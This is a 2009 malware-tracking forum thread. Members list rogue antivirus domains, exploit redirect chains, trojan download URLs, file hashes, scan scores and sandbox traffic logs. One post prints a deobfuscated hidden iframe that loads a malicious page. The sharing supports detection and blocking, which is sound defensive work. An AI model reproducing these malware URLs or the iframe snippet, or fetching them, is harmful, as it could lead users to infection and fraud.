Author Topic: daily something......  (Read 809353 times)

0 Members and 1 Guest are viewing this topic.

April 19, 2009, 07:27:13 am
Reply #330

sparsha

  • Special Members
  • Hero Member

  • Offline
  • *

  • 305
AV Antispyware rogue related sites
Code: [Select]

http://int.reporting32.com/stat.php?func=installrun&id=200002&landing=-1&lang=EN&sub=0
http://dl.scan-antispy-4pc.com/get/?pin=0&lnd=0&type=main
http://sales.mypaymentarea.com/MjAwMDAy_MA==_QkE0MjAxNEM5RTNCMjI3OEE2QkI=/YXZh/1
https://wisypay.net/purchase/?vendor=2&id=49eaa01f4444b


April 20, 2009, 05:57:08 am
Reply #331

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Redirects to exploits:
Code: [Select]
odmina.ru/?v=myid37&lid=1033http://wepawet.iseclab.org/view.php?hash=2a8ea1f1e331a0826ca485ab9e3232e3&t=1240038315&type=js
Redirect to exploits:
Code: [Select]
mixbunch.cn/thread.htmlhttp://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js
Exploits/trojan:
Code: [Select]
sunmaiamibich.ru/pupu/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=cea26289df93bc2a5fd52c0d8767305a&t=1240188628&type=js

Trojan:
Code: [Select]
tayforlive.ru/gh.exehttp://www.virustotal.com/analisis/4317e8d4fca9ab9bf03c9cb727e43037
Trojan:
Code: [Select]
feds-r-watching.us/load.php?id=0&spl=1.exedechttp://www.virustotal.com/analisis/8b1f9ae18260c2d50f447e34eef66e02

Redirect to rogue:
Code: [Select]
spyware-files.info/0/go.php?sid=2
spyware-file.info/0/go.php?sid=2

AV fraud:
Code: [Select]
http://loyalvideoz.com/scan/?id=260
Mal-Aware

April 21, 2009, 12:59:20 pm
Reply #332

sparsha

  • Special Members
  • Hero Member

  • Offline
  • *

  • 305
Sites related to rogue application: Home Antivirus 2009

Code: [Select]
h-a-virus-2009.com
h-a-virus2009.com
h-anti-virus-2009.com
h-anti-virus2009.com
h-antivirus2009.com
h-avirus2009.com
ha-virus2009.com
hanti-virus2009.com
hantivirus2009.com
havirus2009.com
home-a-v-2009.com
home-a-virus-2009.com
home-anti-v2009.com
home-anti-virus-2009.com
home-anti-virus2009.com
home-antiv2009.com
home-antivirus2009.com
home-av-2009.com
home-av2009.com
home-avirus2009.com
homeanti-virus-2009.com
homeantiv2009.com
homeantivirus2009.com
homeav-2009.com
homeav2009.com
homeavirus-2009.com
homeavirus2009.com

April 21, 2009, 09:19:08 pm
Reply #333

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Mal-Aware

April 22, 2009, 04:43:24 am
Reply #334

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
coolwallpapers.statusinfotech.com/ppi/install.exehttp://virscan.org/report/6fcf3670f1e511be8925b19d176205dc.html 14/38
Ruining the bad guy's day

April 22, 2009, 06:33:20 am
Reply #335

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

April 22, 2009, 11:26:06 am
Reply #336

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
209.44.126.29

Redirects to exploits:
Code: [Select]
hxxp://individualpeople.biz/go.php?sid=1
Wepawet

Exploits:
Code: [Select]
hxxp://individualpeople.biz/go.php?sid=6
Wepawet

PDF Exploits:
Code: [Select]
hxxp://209.44.126.30/unsecurity/pdf.php?id=19663

File name: 1.pdf
File size: 7324 bytes
MD5: be9a4f50c3fb024a170b9ec53dd712d4
VirusTotal - 15/40 (37.5%)

Trojan:
Code: [Select]
hxxp://209.44.126.30/unsecurity/load.php?id=19663

File name: load.exe
File size: 94208 bytes
MD5: 47c0c6c2ce07c291651070b03dd83d7f
VirusTotal: Trojan TDSS - 29/40 (72.5%)
Anubis

Quote
From ANUBIS:1033 to 92.48.91.145:80 - [trafficstatic.net] 
Request: GET /banner/crcmds/main 
Response: 200 "OK" 
.......
From ANUBIS:1053 to 72.233.114.126:80 - [statsanalist.cn] 
Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 
Response: 200 "OK" 
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 
Response: 200 "OK" 

April 22, 2009, 07:22:22 pm
Reply #337

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

April 22, 2009, 07:35:11 pm
Reply #338

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
JS IFRAME
Code: [Select]
hxxp://counnter.cn/top100_00.js
Wepawet

Exploits:
Code: [Select]
hxxp://counnter.cn/z/count.php?o=1
Wepawet

Exploits:
Code: [Select]
hxxp://counnter.cn/z/exploits/x9.php?zenturi=1
hxxp://counnter.cn/z/exploits/x7b.php
Wepawet
Jsunpack

Exploits (x15b.zip):
Code: [Select]
hxxp://counnter.cn/z/exploits/x15b.php
VirusTotal: Trojan 33/40 (82.5%)

Trojan (getexe.exe):
Code: [Select]
hxxp://counnter.cn/z/getexe.exe?o=1&t=1239892730&i=2154770527&e=10
VirusTotal: Trojan - 15/40 (37.5%)

April 22, 2009, 07:35:31 pm
Reply #339

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

April 22, 2009, 10:54:30 pm
Reply #340

PaJamis

  • Special Access
  • Jr. Member

  • Offline
  • *

  • 14
hxxp://www.edfvc.com

Comes up with Mal/Obfjs-AE with Sophos
http://www.sophos.com/security/analyses/viruses-and-spyware/malobfjsae.html

Obfuscated JS resolves to:

Code: [Select]
<iframe src="hxxp://googl-analisys.com/adwds/words.php?U8jG" style="display:none"></iframe>
MysteryFCM: Encased iFrame HTML in BBCode "CODE" tags.

April 22, 2009, 11:34:25 pm
Reply #341

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
zbot:
Code: [Select]
zss5dfggd.com/exe/ue.exehttp://www.virustotal.com/analisis/d5ba440a4de0b771088cd4b3714dbfae
Trojan:
Code: [Select]
zss5dfggd.com/exe/9.exehttp://www.virustotal.com/analisis/cafeb16b4df77833b8b1218f2f30b3ea
Trojan:
Code: [Select]
zss5dfggd.com/exe/lich.exehttp://www.virustotal.com/analisis/dde89e65277fe2cab50bc054c4c1e499
Trojan:
Code: [Select]
zss5dfggd.com/exe/gld.exehttp://www.virustotal.com/analisis/c48f145c65c717fcf4b750ae2c7cdd89
Trojan:
Code: [Select]
zss5dfggd.com/exe/mp.exehttp://www.virustotal.com/analisis/862f2e619d840b98a6e359e2ddb84f24

Fake AV:
Code: [Select]
winpcdown9.com/pcdef.exehttp://www.virustotal.com/analisis/ad13d92e29f9521c6ae48760ea106ed9
and the payment site it use:
Code: [Select]
billingpayment.net/pp/?id=
Fake online scan:
Code: [Select]
litetubevideoz.com/scanand the trojan that is downloaded:
Code: [Select]
litetubevideoz.com/codec.exehttp://www.virustotal.com/analisis/7b25de92bab8faf17a0da0acd7464afb

trojan:
Code: [Select]
litetubevideoz.com/null/exe2/3913443.exehttp://www.virustotal.com/analisis/4ba420744c78124fe6c00a28045628ae

Fake online scan:
Code: [Select]
online-spyware-scan.net/online-scan.html?ewmid=226
Mal-Aware

April 23, 2009, 12:53:43 pm
Reply #342

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
from banner ads to fake av

Code: [Select]
perfect-banner.com/www/images/300x250_uof_2.swf?clickTARGET=_blank&clickTAG=http://perfect-banner.com/www/delivery/ck.php?oaparams=2__bannerid=250__zoneid=171__cb=c8b86ececehttp://wepawet.iseclab.org/view.php?hash=17501d47ade222cffa45fc0f2f7c84bc&type=swf

swf redirects to
Code: [Select]
enjoyspringtime.com/?cmpid=dologology
redirects to
Code: [Select]
crustat.com/ts/in.cgi?mfcdologology&se=oth&ur=1&HTTP_REFERER=enj-cmpid%3Ddologology

redirects to
Code: [Select]
pnfzetnax.net/pro/dologology/
redirects to
Code: [Select]
78.47.132.220/aff78.php?url=http://truconv.com/?a=125&s=4a78
redirects to
Code: [Select]
78.47.132.220/a82a/cr/adv/142/index.html
Code: [Select]
78.47.132.220/a82a/cr/srm_free_setup.exehttp://www.virustotal.com/de/analisis/07fe8c68d017097af9ec74ebb8cc1dc6 18/40
MD5...: 66c7e910330c631ba4515781f44e2788




Ruining the bad guy's day

April 24, 2009, 12:14:52 am
Reply #343

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Mal-Aware

April 24, 2009, 10:49:44 am
Reply #344

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
Redirects to trojan:
Code: [Select]
hxxp://zbesttds.com/in.cgi?3
hxxp://zbesttds.com/in.cgi?4
Wepawet
Code: [Select]
hxxp://zbesttds.com/in.cgi?5
hxxp://400.myfilehostings.net/movie.html
Wepawet
Code: [Select]
hxxp://tafficbots.com/in.cgi?8
hxxp://tafficbots.com/in.cgi?9
Wepawet
Wepawet
Trojan:
Code: [Select]
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/3.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/4.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/6.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/7.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/8.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/9.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424103022287492/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241031340125215/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241035734251381/1.gif
Quote
Size:   125440 bytes,
MD5:   f4342703b051c0ea1c81f0330f10dc3f
VirusTotal - 30/40 (75%)

*****************
Redirects to google:
Code: [Select]
hxxp://zbesttds.com/in.cgi?11
hxxp://zbesttds.com/in.cgi?16
Wepawet
Wepawet

*****************
Redirects to rogue: (dead since a few hours)
Code: [Select]
hxxp://zbesttds.com/in.cgi?14
Wepawet

*****************
Redirects to rogue:
Code: [Select]
hxxp://hitmidpoint.com/?accs=809&tid=1
hxxp://staritquick.com/in.cgi?13&gai=csptop&gli=100&gff=cs_362527174&al=
Wepawet

*****************
Redirects to fake codec page:
Code: [Select]
hxxp://delshiktds.com/in.cgi?3
hxxp://myhealtharea.cn/in.cgi?2
Fake codec page:
Code: [Select]
hxxp://xtube-download.freehostia.com/tube.htm
Wepawet

*****************
Redirects to fake codec page:
Code: [Select]
hxxp://tafficbots.com/in.cgi?7
Wepawet
Fake codec page:
Code: [Select]
hxxp://megaporntubes09.com/xplaymovie.php?id=40011
Wepawet
Trojan:
Code: [Select]
hxxp://lll-softportal.com/softwarefortubeview.40011.exe
VirusTotal: Trojan - 7/40 (17.5%)

*****************
Redirects to rogue:
Code: [Select]
hxxp://kernelseo.com/in.cgi?default&parameter=up-file+download&se=15557
Wepawet